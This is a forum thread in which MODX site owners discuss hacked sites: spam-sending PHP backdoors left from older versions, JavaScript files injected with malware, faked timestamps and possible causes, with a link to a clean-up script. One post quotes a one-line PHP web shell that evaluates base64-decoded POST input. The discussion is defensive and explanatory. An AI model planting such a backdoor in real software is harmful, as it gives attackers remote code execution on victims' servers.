Oh, this was a evo thread. I didnt want to hijack it. Anyway, it belongs together somehow.
-
- 17 Posts
Hello,
I started this threat....
First: Great that so many people give rep sons and feedback!
But....
Everybody is talking about another old hack. This hack, everybody is talking about, is installed by old files from 10.0.x When you update to 10.0.14 it's possible the installed hack files are not gone ans still can used by the hacker. The hacker installed random .php files with an encrypted code and somethimes starts it with a code <?php eval(base64_decode($_POST['<random_string_here>']));?> When he starts the code, the server starts to spam mail. In no time youre server is on a blacklist...
I am talking about something else.....
Some of my sites where offline because of an Hacker installed Malware. Google noticed this an immediately they blocked the site with an warning message and no happy clients....
The hacker infected all of my .js files with the code you find in the attachment
My question is, how could this happen and how can i prevent this...
[ed. note: yoman last edited this post 9 years, 7 months ago.]
-
- 230 Posts
same here (like Spheerys described above) - and I was pretty sure that we've cleand everything when we updated to 1.0.14.
Modified files were from last week.
In this case we also replaced manager and assets folder completely and
found, that there is a newer library available for
/assets/snippetes/phpthumb/phpthumb.class.php
(updated to Version 1.7.13-201406261000)
That might be a new vulnerability, but I'm not absolutely sure.
-
- 463 Posts
I just got asked to look at a crippled Modx site. I'm seeing the same hack with every .js file on the site affected with the script as mentioned by Yoman.
It also gets mentioned here along with a possible clean-up script:
http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/
-
- 230 Posts
Quote from: Jako at Sep 17, 2014, 08:39 AMThis phpthumb version is already in the bugfix branch. But I don't think that it has that security issues (see changelog).
Do you have an access log around the time the files were modified?
unfortunately not
-
- 409 Posts
Could it be possible than the malware is hiding himself on the database ?
For example, if we delete blog.php (or similar), like a "magic", the malicious code is recreating them from the database ?
-
- 230 Posts
Quote from: Spheerys at Sep 17, 2014, 09:11 AMCould it be possible than the malware is hiding himself on the database ?
For example, if we delete blog.php (or similar), like a "magic", the malicious code is recreating them from the database ?
Possible? yes. But not very likely. You can test that with a dump of your database and a text search against the content of your blog.php
edit: typos
-
- 463 Posts
What I know so far if it helps...
Time stamps on the server don't give any clue as they are falsified to make it look like they are older.
Seems like .php files are 'planted' around 60 days before injection into .js files happens.
Can't find anything in the database that indicates it's compromised.